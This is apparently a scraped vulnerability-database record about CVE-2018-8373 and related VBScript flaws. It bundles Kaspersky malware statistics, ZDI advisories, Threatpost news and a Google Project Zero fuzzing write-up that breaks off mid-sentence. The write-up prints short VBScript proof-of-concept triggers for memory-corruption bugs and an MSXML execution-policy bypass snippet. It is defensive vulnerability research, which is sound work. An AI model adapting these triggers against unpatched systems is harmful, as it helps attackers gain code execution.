\n20 | Honduras | 22.97 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users targeted by malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 18.92% of internet users' computers worldwide experienced at least one _malware-class_ web attack.\n\n_Geography of malicious web attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151916/it-threat-evolution-q3-2018-statistics_20_en.png>)\n\n## Local threats\n\n_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or via removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. Analysis takes account of the malicious programs identified on user computers or on removable media connected to computers \u2013 flash drives, camera memory cards, phones and external hard drives._\n\nIn Q3 2018, Kaspersky Lab's file antivirus detected **239,177,356** unique malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Uzbekistan | 54.93 \n2 | Afghanistan | 54.15 \n3 | Yemen | 52.12 \n4 | Turkmenistan | 49.61 \n5 | Tajikistan | 49.05 \n6 | Laos | 47.93 \n7 | Syria | 47.45 \n8 | Vietnam | 46.07 \n9 | Bangladesh | 45.93 \n10 | Sudan | 45.30 \n11 | Ethiopia | 45.17 \n12 | Myanmar | 44.61 \n13 | Mozambique | 42.65 \n14 | Kyrgyzstan | 42.38 \n15 | Iraq | 42.25 \n16 | Rwanda | 42.06 \n17 | Algeria | 41.95 \n18 | Cameroon | 40.98 \n19 | Malawi | 40.70 \n20 | Belarus | 40.66 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users on whose computers **malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.\n\n_Geography of local malware attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151949/it-threat-evolution-q3-2018-statistics_21_en.png>)\n\nOn average, 22.53% of computers globally faced at least one malware-class local threat in Q3.", "modified": "2018-11-12T10:00:55", "published": "2018-11-12T10:00:55", "id": "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "href": "https://securelist.com/it-threat-evolution-q3-2018-statistics/88689/", "type": "securelist", "title": "IT threat evolution Q3 2018. Statistics", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2020-06-22T11:41:59", "bulletinFamily": "info", "cvelist": ["CVE-2018-8373"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows VBScript. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of arrays. By performing actions in script, an attacker can cause a pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-08-14T00:00:00", "id": "ZDI-18-953", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-953/", "title": "Microsoft Windows VBScript Array Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:39", "bulletinFamily": "info", "cvelist": ["CVE-2018-8345"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of .LNK files. Crafted data in a .LNK file can trigger access to a pointer prior to initialization. An attacker can leverage this vulnerability to execute code under the context of the current user.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-08-14T00:00:00", "id": "ZDI-18-942", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-942/", "title": "Microsoft Windows LNK File Uninitialized Pointer Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-07-16T08:13:01", "bulletinFamily": "info", "cvelist": ["CVE-2018-8174", "CVE-2018-8373"], "description": "Researchers have discovered that the Darkhotel APT is exploiting a recently-patched zero-day vulnerability impacting Microsoft VBScript.\n\nResearchers at Trend Micro recently disclosed the flaw in Microsoft Visual Basic Scripting Engine (VBScript), an active scripting language developed by Microsoft modeled on Visual Basic. The flaw is a remote code-execution vulnerability ([CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373?ranMID=24542&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-UQjTbztLkW0290jkC0XcNQ&epi=je6NUbpObpQ-UQjTbztLkW0290jkC0XcNQ&irgwc=1&OCID=AID681541_aff_7593_1243925&tduid=\\(ir_wqPRf:QNmVWaQgdzLGyG5XJfUkg0zn1lRX:FTM0\\)\\(7593\\)\\(1243925\\)\\(je6NUbpObpQ-UQjTbztLkW0290jkC0XcNQ\\)\\(\\)&irclickid=wqPRf:QNmVWaQgdzLGyG5XJfUkg0zn1lRX:FTM0>)) existing in the way that the scripting engine handles objects in memory in Internet Explorer.\n\nMicrosoft patched the flaw during last week\u2019s [Patch Tuesday](<https://threatpost.com/patch-tuesday-microsoft-addresses-two-zero-days-in-60-flaw-roundup/135103/>) \u2013 but soon after, researchers with Trend Micro and Qihoo 360 both linked the attack with the Darkhotel APT gang.\n\n\u201cIt can be seen from this incident that the [Darkhotel] attack gang has maintained a relatively high level of activity in recent years, and will even use the 0-day vulnerability for the purpose of attack,\u201d Qihoo 360 researchers said in their recent post about the [campaign](<https://ti.360.net/blog/articles/analyzing-attack-of-cve-2018-8373-and-darkhotel/>).\n\n## CVE-2018-8373\n\nElliot Cao of Trend Micro Security Research (working with Trend Micro\u2019s Zero Day Initiative) first discovered the flaw July 11. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.\n\nAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user \u2013 so if the current user is logged on with administrative-user rights, an attacker who successfully exploited the vulnerability could take control of an affected system, according to Microsoft. Attackers could then install programs; view, change or delete data; or create new accounts with full user rights.\n\n\u201cIt could result in remote code-execution and grants the same privileges as the logged-in user, including administrative rights,\u201d said Chris Goettl, director of product management, security, for Ivanti, in an email. \u201cBecause this vulnerability exists in IE 9, 10 and 11, it affects all Windows operating systems from Server 2008 to Windows 10.\u201d\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website.\n\nThe flaw impacts the VBSCript engine in the latest versions of Windows as well as Internet Explorer versions IE 9 and 10. Microsoft recently [disabled](<https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/>) VBScript in IE 11, meaning that this version of Internet Explorer is not impacted.\n\nMicrosoft has given the flaw a \u201c2\u201d on the Exploitability Index for the latest software release, meaning exploitation is less likely; however, exploitation has been detected on older releases, including the latest Darkhotel effort.\n\n## Darkhotel\n\nAfter discovering an exploit for CVE-2018-8373, Trend Micro researchers found that the sample used the same obfuscation technique as exploits for CVE-2018-8174, a VBScript engine remote code-execution vulnerability [patched back in May](<https://threatpost.com/may-patch-tuesday-fixes-two-bugs-under-active-attack/131811/>).\n\n\u201cThis is similar to CVE-2018-8174, which has been circulating since before May\u2019s patch Tuesday, primarily in Asia\u2026 The same techniques were used by both exploits. Both were leveraging [use-after-frees] within VBScript Engine, were hitting similar functions within the engine, and had a similar method for running shellcode,\u201d Dustin Childs, with Trend Micro\u2019s ZDI, told Threatpost.\n\nAs the flaw was similar to the use-after-free (UAF) vulnerability in vbscript.dll, called Double Kill, which remained unpatched in the latest VBScript engine, researchers suspected that this exploit sample came from the same creator. Researchers were also able to obtain the domain name used by the exploit, and found that it was the same one used in May for Darkhotel APT.\n\nDarkhotel was first identified in [2014](<https://threatpost.com/darkhotel-apt-group-targeting-top-executives-in-long-term-campaign/109265/>) by Kaspersky Lab researchers, who said the group had been active since at least 2007. The group was known for targeting diplomats and corporate executives via Wi-Fi networks at luxury hotels \u2013 and has since then continued accessing zero-day vulnerabilities and exploits.\n\n## Exploit\n\nThe original exploit was heavily obfuscated, but researchers were able to demonstrate a proof of concept (PoC) to explain how the flaw could be exploited.\n\n\u201cBased on our analysis, this vulnerability can be steadily exploited,\u201d Cao said in the analysis of the exploit. \u201cMoreover, since it is the second Visual Basic engine exploit found in the wild this year, it is not far-fetched to expect other vulnerability findings in the VB engine in the future.\u201d\n\nThere are three parts to the PoC exploit used to trigger use-after-free memory corruption, thus enabling attackers to run shellcode on the system: Using the vulnerability to modify a two-dimensional array\u2019s structure\u2019s length (to 0x0FFFFFFF), implementing read/write primitives and faking CONTEXT structure to execute shellcode.\n\nChilds told us that, while not widespread at this time, the exploit \u201ccertainly has the chance of broader use since it\u2019s a reliable attack.\u201d\n\nHe added, \u201cFor this to succeed, the attacker must convince the user to click a link or open a malicious file. This is usually done through spear phishing, but it could be links sent through messenger apps, too.\u201d\n\nCao recommended that users update their systems as soon as possible: \u201cAs a first line of defense, we recommend applying the latest security patches once they\u2019re available to prevent exploits,\u201d he said.\n", "modified": "2018-08-20T16:39:26", "published": "2018-08-20T16:39:26", "id": "THREATPOST:F6D26AE5EBA39346A2B00CE4C6470A88", "href": "https://threatpost.com/darkhotel-exploits-microsoft-zero-day-vbscript-flaw/136685/", "type": "threatpost", "title": "Darkhotel Exploits Microsoft Zero-Day VBScript Flaw", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-06T08:15:37", "bulletinFamily": "info", "cvelist": ["CVE-2018-3615", "CVE-2018-3620", "CVE-2018-3646", "CVE-2018-8273", "CVE-2018-8302", "CVE-2018-8344", "CVE-2018-8373", "CVE-2018-8380", "CVE-2018-8381", "CVE-2018-8385", "CVE-2018-8414"], "description": "Microsoft has rolled out its August Patch Tuesday fixes, addressing 19 critical vulnerabilities, including fixes for two zero-day vulnerabilities that are under active attack.\n\nOverall, the company patched a total of 60 flaws, spanning Microsoft Windows, Edge, Internet Explorer (IE), Office, .NET Framework, ChakraCore, Exchange Server, Microsoft SQL Server and Visual Studio. Of those, 19 were critical, 39 were rated important, one was moderate and one was rated low in severity.\n\n## Zero-Days\n\nThe patch [release](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/ecb26425-583f-e811-a96f-000d3a33c573>) includes two exploited flaws, CVE-2018-8373 and CVE-2018-8414, which were previously disclosed by researchers.\n\nThe first zero-day, CVE-2018-8373, could result in remote code-execution (RCE) and grants the same privileges as a logged-in user, including administrative rights. The vulnerability exists in IE 9, 10 and 11, impacting all Windows operating systems from Server 2008 to Windows 10.\n\nMeanwhile, CVE-2018-8414 also enables RCE with the privileges of the logged-in user, and exists on Windows 10 versions 1703 and newer, as well as Server 1709 and Server 1803.\n\n\u201cThe two zero-day vulnerabilities are \u2026 publicly disclosed and exploited,\u201d said Chris Goettl, director of product management, security, for Ivanti, in an email. \u201cCVE-2018-8373 is a vulnerability that exists in the way that the scripting engine handles objects in memory in Internet Explorer. CVE-2018-8414 code-execution vulnerability exists when the Windows Shell does not properly validate file paths.\u201d\n\nMicrosoft also issued fixes for security issues that don\u2019t impact Windows, but the company thought they were important enough to package into its OS updates, dubbed advisories.\n\nOne of these, [Advisory 180018](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180016>), touched on a new Meltdown and Spectre variant. This advisory, \u201cMicrosoft Guidance to Mitigate L1TF Variant,\u201d addresses three vulnerabilities \u2013 CVE-2018-3615, CVE-2018-3620 and CVE-2018-3646. These speculative side-channel flaws were also [disclosed today](<https://threatpost.com/intel-cpus-afflicted-with-fresh-speculative-execution-flaws/135096/>) by Intel.\n\n\u201cCorrecting these vulnerabilities requires both a software and firmware (microcode) update,\u201d said Goettl. \u201cAs a mitigation, Microsoft does recommend disabling hyper-threading which can have a major performance impact.\u201d\n\nMicrosoft also pushed a security advisory, [ADV180020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180020>), for flaws in impacted Adobe products, which were also touched on by Adobe in a separate Patch Tuesday release earlier [today.](<https://threatpost.com/adobe-patch-tuesday-release-fixes-critical-acrobat-and-reader-flaws/135058/>)\n\n## Other Flaws\n\nThere are also several memory corruption vulnerabilities in Microsoft Edge, Internet Explorer 9-11 and the Chakra Scripting Engine (including CVE-2018-8380, CVE-2018-8381 and CVE-2018-8385).\n\n\u201cThis vulnerability occurs when Microsoft Edge accesses object in memory, which could allow an attacker to execute code on the victim\u2019s system,\u201d Allan Liska, threat intelligence analyst at Recorded Future, told Threatpost. \u201cThis type of memory corruption is usually exploited using a JavaScript, or other client-side scripting language, on a website the attacker owns or has compromised.\u201d\n\nAlso, Microsoft SQL Server 2016 and 2017 contain a buffer overflow [vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8273>) (CVE-2018-8273) that can be remotely exploited with a specific SQL query directed to the server.\n\n\u201cThis vulnerability is particularly concerning because it is relatively trivial to execute and many Microsoft SQL Servers are publicly accessible, which may mean an immediate uptick in attacks against these servers,\u201d said Liska.\n\nMicrosoft also patched a Microsoft Graphics RCE vulnerability (CVE-2018-8344) in Windows 7-10 and Windows Server 2008-2016, which exists in the way that Microsoft handles certain embedded fonts.\n\nFinally, Microsoft Exchange, versions 2010-2016, contains a memory corruption vulnerability (CVE-2018-8302) that, when properly exploited, would also enable RCE. To exploit this vulnerability, an attacker needs to send a specially crafted email to any account using the targeted Exchange Server. When the Exchange Server processes the incoming malicious email, it triggers the memory corruption vulnerability and is able to execute the attached code.\n\nMicrosoft\u2019s Patch Tuesday comes after the company found itself in hot water last month after its new update model caused stability issues for Windows operating systems and applications, particularly in July. The model irked customers so much that enterprise patching veteran Susan Bradley wrote an [open letter](<https://www.computerworld.com/article/3293440/microsoft-windows/an-open-letter-to-microsoft-management-re-windows-updating.html>) to Microsoft executives expressing the \u201cdissatisfaction your customers have with the updates released for Windows desktops and servers in recent months.\u201d\n", "modified": "2018-08-14T20:42:41", "published": "2018-08-14T20:42:41", "id": "THREATPOST:961233DDAF80602C2DDEC2B819294F05", "href": "https://threatpost.com/patch-tuesday-microsoft-addresses-two-zero-days-in-60-flaw-roundup/135103/", "type": "threatpost", "title": "Patch Tuesday: Microsoft Addresses Two Zero-Days in 60-Flaw Roundup", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:41", "bulletinFamily": "info", "cvelist": ["CVE-2018-8174", "CVE-2018-8373"], "description": "Posted by Ivan Fratric, Google Project Zero\n\n** \n**\n\nIntroduction\n\n** \n**\n\nVulnerabilities in the [VBScript](<https://en.wikipedia.org/wiki/VBScript>) scripting engine are a well known way to attack Microsoft Windows. In order to reduce this attack surface, in Windows 10 Fall Creators Update, Microsoft [disabled](<https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/#rwFwvJ9JSX18pj2h.97>) VBScript execution in Internet Explorer in the Internet Zone and the Restricted Sites Zone by default. Yet this did not deter attackers from using it - in 2018 alone, there have been at least two instances of 0day attacks using vulnerabilities in VBScript: [CVE-2018-8174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174>) and [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>). In both of these cases, the delivery method for the exploit were Microsoft Office files with an embedded object which caused malicious VBScript code to be processed using the Internet Explorer engine. For a more detailed analysis of the techniques used in these exploits please refer to their analysis by the original discoverers [here](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) and [here](<https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/>).\n\n** \n**\n\nBecause of this dubious popularity of VBScript, multiple security researchers took up the challenge of finding (and reporting) other instances of VBScript vulnerabilities, including a number of variants of those vulnerabilities used in the wild. Notably, researchers working with the Zero day initiative discovered [multiple instances of vulnerabilities](<https://www.thezdi.com/blog/2018/5/15/its-time-to-terminate-the-terminator>) relying on VBScript Class_Terminate callback and Yuki Chen of Qihoo 360 Vulcan Team discovered [multiple variants](<http://blogs.360.cn/post/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day.html>) of CVE-2018-8174 (one of the exploits used in the wild).\n\n** \n**\n\nAs a follow up to those events, this blog post tries to answer the following question: Despite all of the existing efforts from Microsoft and the security community, how easy is it to still discover new VBScript vulnerabilities? And how strong are Windows policies intended to stop these vulnerabilities from being exploited?\n\n** \n**\n\nEven more VBScript vulnerabilities\n\n** \n**\n\nThe approach we used to find VBScript vulnerabilities was quite straightforward: We used the already published [Domato](<https://github.com/googleprojectzero/domato>) grammar fuzzing engine and wrote a grammar that describes the built-in VBScript functions, various callbacks and other common patterns. This is the same approach we used successfully [previously](<https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html>) to find multiple vulnerabilities in the JScript scripting engine and it was relatively straightforward to do the same for VBScript. The grammar and the generator script can be found [here](<https://github.com/googleprojectzero/domato/tree/master/vbscript>).\n\n** \n**\n\nThis approach resulted in uncovering three new VBScript vulnerabilities that we reported to Microsoft and are now fixed. The vulnerabilities are interesting, not because they are complex, but precisely for the opposite reason: they are pretty straightforward (yet, somehow, still survived to this day). Additionally, in several cases, there are parallels that can be drawn between the vulnerabilities used in the wild and the ones we found.\n\n** \n**\n\nTo demonstrate this, before taking a look at the first vulnerability the fuzzer found, let\u2019s take a look at a PoC for the latest VBScript 0day found in the wild:\n\n** \n**\n\nClass MyClass\n\nDim array\n\nPrivate Sub Class_Initialize\n\nReDim array(2)\n\nEnd Sub\n\n** \n**\n\nPublic Default Property Get P\n\nReDim preserve array(1)\n\nEnd Property\n\nEnd Class\n\n** \n**\n\nSet cls = new MyClass\n\ncls.array(2) = cls\n\n** \n**\n\nTrend Micro has a more detailed [analysis](<https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/>), but in short, the most interesting line is\n\n** \n**\n\ncls.array(2) = cls\n\n** \n**\n\nIn it, the left side is evaluated first and the address of variable at cls.array(2) is computed. Then, the right side is evaluated, and because cls is an object of type MyClass which has a default property getter, it triggers a callback. Inside the callback, the array is resized and the address of the variable computed previously is no longer valid - it now points to the freed memory. This results in writing to a freed memory when the line above gets executed.\n\n** \n**\n\nNow, let\u2019s compare this sample to the PoC for the first issue we found:\n\n** \n**\n\nClass MyClass\n\nPrivate Sub Class_Terminate()\n\ndict.RemoveAll\n\nEnd Sub\n\nEnd Class\n\n** \n**\n\nSet dict = CreateObject(\"Scripting.Dictionary\")\n\nSet dict.Item(\"foo\") = new MyClass\n\ndict.Item(\"foo\") = 1\n\n** \n**\n\nOn the first glance, this might not appear all that similar, but in reality they are. The line that triggers the issue is\n\n** \n**\n\ndict.Item(\"foo\") = 1\n\n** \n**\n\nIn it, once again, the left side is allocated first and the address of dict.Item(\"foo\") is computed. Then, a value is assigned to it, but because there is already a value there it needs to be cleared first. Since the existing value is of the type MyClass, this results in a Class_Terminate() callback, in which the dict is cleared. This, once again, causes that the address computed when evaluating the left side of the expression now points to a freed memory.\n\n** \n**\n\nIn both of these cases, the pattern is:\n\n 1. Compute the address of a member variable of some container object\n\n 2. Assign a value to it\n\n 3. Assignment causes a callback in which the container storage is freed\n\n 4. Assignment causes writing to a freed memory\n\n** \n**\n\nThe two differences between these two samples are that:\n\n 1. In the first case, the container used was an array and in the second it was a dictionary\n\n 2. In the first case, the callback used was a default property getter, and in the second case, the callback was Class_Terminate.\n\n** \n**\n\nPerhaps it was because this similarity with a publicly known sample that this variant was also independently discovered by a researcher working with Trend Micro's Zero Day Initiative and Yuki Chen of Qihoo 360 Vulcan Team. Given this similarity, it would not be surprising if the author of the 0day that was used in the wild also knew about this variant.\n\n** \n**\n\nThe second bug we found wasn\u2019t directly related to any 0days found in the wild (that we know about), however it is a classic example of a scripting engine vulnerability:\n\n** \n**\n\nClass class1\n\nPublic Default Property Get x\n\nReDim arr(1)\n\nEnd Property\n\nEnd Class\n\n** \n**\n\nset c = new class1\n\narr = Array(\"b\", \"b\", \"a\", \"a\", c)\n\nCall Filter(arr, \"a\")\n\n** \n**\n\nIn it, a Filter function gets called on an array. The Filter function walks the array and returns another array containing just the elements that match the specified substring (\"a\" in this case). Because one of the members of the input array is an object with a default property getter, this causes a callback, and in the callback the input array is resized. This results in reading variables out-of-bounds once we return from the callback into the implementation of the Filter function.\n\n** \n**\n\nA possible reason why this bug survived this long could be that the implementation of the Filter function tried to prevent bugs like this by checking if the array size is larger (or equal) than the number of matching objects at every iteration of the algorithm. However, this check fails to account for array members that do not match the given substring (such as elements with the value of \"b\" in the PoC).\n\n** \n**\n\nIn their advisory, Microsoft (initially) incorrectly classified the impact of this issue as an infoleak. While the bug results in an out-of-bounds read, what is read out-of-bounds (and subsequently returned to the user) is a VBScript variable. If an attacker-controlled data is interpreted as a VBScript variable, this can result in a lot more than just infoleak and can easily be converted into a code execution. This issue is a good example of why, in general, an out-of-bounds read can be more than an infoleak: it always depends on precisely what kind of data is being read and how it is used.\n\n** \n**\n\nThe third bug we found is interesting because it is in the code that was already heavily worked on in order to address CVE-2018-8174 and the [variants](<http://blogs.360.cn/post/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day.html>) found by the Qihoo 360 Vulcan Team. In fact, it is possible that the bug we found was introduced when fixing one of the previous issues.\n\n** \n**\n\nWe initially became aware of the problem when the fuzzer generated a sample that resulted in a NULL-pointer dereference with the following (minimized) PoC:\n\n** \n**\n\nDim a, r\n\n** \n**\n\nClass class1\n\nEnd Class\n\n** \n**\n\nClass class2\n\nPrivate Sub Class_Terminate()\n\nset a = New class1\n\nEnd Sub\n\nEnd Class\n\n** \n**\n\na = Array(0)\n\nset a(0) = new class2\n\nErase a\n\nset r = New RegExp\n\nx = r.Replace(\"a\", a)\n\n** \n**\n\nWhy does this result in a NULL-pointer dereference? This is what happens:\n\n 1. An array a is created. At this point, the type of a is an array.\n\n 2. An object of type class2 is set as the only member of the array\n\n 3. The array a is deleted using the Erase function. This also clears all array elements.\n\n 4. Since class2 defines a custom destructor, it gets called during Erase function call.\n\n 5. In the callback, we change the value of a to an object of type class1.The type of a is now an object.\n\n 6. Before Erase returns, it sets the value of variable a to NULL. Now, a is a variable with the type object and the value NULL.\n\n 7. In some cases, when a gets used, this leads to a NULL-pointer dereference.\n\n** \n**\n\nBut, can this scenario be used for more than a NULL-pointer dereference. To answer this question, let\u2019s look at step 5. In it, the value of a is set to an object of type class1. This assignment necessarily increases the reference count of a class1 object. However, later, the value of a is going to be set to NULL without decrementing the reference count. When the PoC above finishes executing, there will be an object of type class1 somewhere in memory with a reference count of 1, but no variable will actually point to it. This leads us to a reference leak scenario. For example, consider the following PoC:\n\n** \n**\n\nDim a, c, i\n\n** \n**\n\nClass class1\n\nEnd Class\n\n** \n**\n\nClass class2\n\nPrivate Sub Class_Terminate()\n\nset a = c\n\nEnd Sub\n\nEnd Class\n\n** \n**\n\nSet c = New class1\n\nFor i = 1 To 1000\n\na = Array(0)\n\nset a(0) = new class2\n\nErase a\n\nNext\n\n** \n**\n\nUsing the principle described above, the PoC above will increase the reference count for variable c to 1000 when in reality only one object (variable c) will hold a reference to it. Since a reference count in VBScript is a 32-bit integer, if we increase it sufficient amount of times, it is going to overflow and the object might get freed when there are still references to it.\n\n** \n**\n\nThe above is not exactly true, because custom classes in VBScript have protection against reference count overflows, however this is not the case for built-in classes, such as RegExp. So, we can just use an object of type RegExp instead of class1 and the reference count will overflow eventually. As every reference count increase requires a callback, \u201ceventually\u201d here could mean several hours, so the only realistic exploitation scenario would be someone opening a tab/window and forgetting to close it - not really an APT-style attack (unlike the previous bugs discussed) but still a good example how the design of VBScript makes it very difficult to fix the object lifetime issues.\n\n** \n**\n\nHunting for reference leaks\n\n** \n**\n\nIn an attempt to find more reference leaks issues, a simple modification was made to the fuzzer: A counter was added and, every time a custom object was created, in the class constructor, this counter was increased. Similarly, every time an object was deleted, this counter was decreased in the class destructor. When a sample finishes executing and all variables are clear, if this counter is larger than 0, this means there was a reference leak somewhere.\n\n** \n**\n\nThis approach immediately resulted in a variant to the previously described reference leak, which is almost identical but uses [ReDim](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1673>) instead of Erase. Microsoft responded that they are considering this a duplicate of the Erase issue.\n\n** \n**\n\nUnfortunately there is a problem with this approach that prevents it from discovering more interesting reference leak issues: The approach can\u2019t distinguish between \u201cpure\u201d reference leak issues and reference leak issues that are also memory leak issues and thus don\u2019t necessarily have the same security impact. One example of issues this approach gets stuck on are circular references (imagine that object A has a reference to object B and object B also has reference to object A). However, we still believe that finding reference leaks can be automated as described later in this blog post.\n\n** \n**\n\nBypassing VBScript execution policy\n\n** \n**\n\nAs mentioned in the introduction, in Windows 10 Fall Creators Update, Microsoft [disabled](<https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/#rwFwvJ9JSX18pj2h.97>) VBScript execution in Internet Explorer in the Internet Zone and the Restricted Sites Zone by default. This is certainly a step in the right direction. However, let\u2019s also examine the weaknesses in this approach and its implementation.\n\n** \n**\n\nFirstly, note that, by default, this policy only applies to the Internet Zone and the Restricted Sites Zone. If a script runs (or an attacker can make it run) in the Local Intranet Zone or the Trusted Sites Zone, the policy simply does not apply. Presumably this is to strike a balance between the security for the home users and business users that still rely on VBScript on their local intranet. However, it is somewhat debatable whether leaving potential gaps in the end-user security vs. having (behind-the-times) businesses that still rely on VBScript change a default setting strikes the right balance. In the future, we would prefer to see VBScript completely disabled by default in the Internet Explorer engine.\n\n** \n**\n\nSecondly, when implementing this policy, Microsoft forgot to account for some places where VBScript code can be executed in Internet Explorer. Specifically, Internet Explorer supports [MSXML](<https://en.wikipedia.org/wiki/MSXML>) object that has the ability to run VBScript code in XSL Transformations, for example like in the code below.\n\n** \n**\n\n&lt;?xml version='1.0'?&gt;\n\n&lt;xsl:stylesheet version=\"1.0\"\n\nxmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\n\nxmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\n\nxmlns:user=\"http://mycompany.com/mynamespace\"&gt;\n\n** \n**\n\n&lt;msxsl:script language=\"vbscript\" implements-prefix=\"user\"&gt;\n\nFunction xml(str)\n\na = Array(\"Hello\", \"from\", \"VBscript\")\n\nxml = Join(a)\n\nEnd Function\n\n&lt;/msxsl:script&gt;\n\n** \n**\n\n&lt;xsl:template match=\"/\"&gt;\n\n&lt;xsl:value-of select=\"user:xml(.)\"/&gt;\n\n&lt;/xsl:template&gt;\n\n** \n**\n\n&lt;/xsl:stylesheet&gt;\n\n** \n**\n\nMicrosoft did not disable VBScript execution for MSXML, even for websites running in the Internet Zone. This issue was [reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1669>) to Microsoft and fixed at the time of publishing this blog post.\n\n** \n**\n\nYou might think that all of these issues are avoidable if Internet Explorer isn\u2019t used for web browsing, but unfortunately the problem with VBScript (and IE in general) runs deeper than that. Most Windows applications that render web content do it using the Internet Explorer engine, as is the case with Microsoft Office that was used in the recent 0days. It should be said that, earlier this year, Microsoft disabled VBScript creation in Microsoft Office (at least the most recent version), so this popular vector has been blocked. However, there are other applications, including those from third parties, that also use IE engine for rendering web content.\n\n** \n**\n\nFuture research ideas\n\n** \n**\n\nDuring this research, some ideas came up that we didn\u2019t get around to implement. Rather than sitting on them, we\u2019ll list them here in case a reader looking for a light research project wants to pick one of them up:\n\n** \n**\n\n * Combine [VBScript](<https://github.com/googleprojectzero/domato/tree/master/vbscript>) fuzzer with the [JScript](<https://github.com/googleprojectzero/domato/tree/master/jscript>) fuzzer in a way that allows VBScript to access JScript objects/functions and vice-versa. Perhaps issues can be found in the interaction of these two engines. Possibly callbacks from one engine (e.g. default property getter from VBScript) can be triggered in unexpected places in the other engine.\n\n** \n**\n\n * Create a better tool for finding reference leaks. This could be accomplished by running IE in the debugger and setting breakpoints on object creation/deletion to track addresses of live objects. Afterwards, memory could be scanned similarly to how it was done [here](<https://github.com/googleprojectzero/p0tools/blob/master/JITServer/cfgtool.cpp>) to find if there are any objects alive (with reference count &gt;0) that are not actually referenced from anywhere else in the memory (note: Page Heap should be used to ensure there are no stale references from freed memory).\n\n** \n**\n\n * Other objects. During the previous year, a number of bugs were found that rely on Scripting.Dictionary object. Scripting.Dictionary is not one of the built-in VBScript objects, but rather needs to be instantiated using CreateObject function. Are there any other objects available from VBScript that would be interesting to fuzz?\n\n** \n**\n\nConclusion\n\n** \n**\n\nVBScript is a scripting engine from a time when a lot of today\u2019s security considerations weren\u2019t in the forefront of anyone\u2019s thoughts. Because of this, it shouldn\u2019t be surprising that it is a crowd favorite when it comes to attacking Windows systems. And although it received a lot of attention from the security community recently, new vulnerabilities are still straightforward to find. \n\n** \n**\n\nMicrosoft made some good steps in attack surface reduction recently. However in combination with an execution policy bypass and various applications relying on Internet Explorer engine to render web content, these bugs could still endanger even users using best practices on up-to-date systems. We hope that, in the future, Microsoft is going to take further steps to more 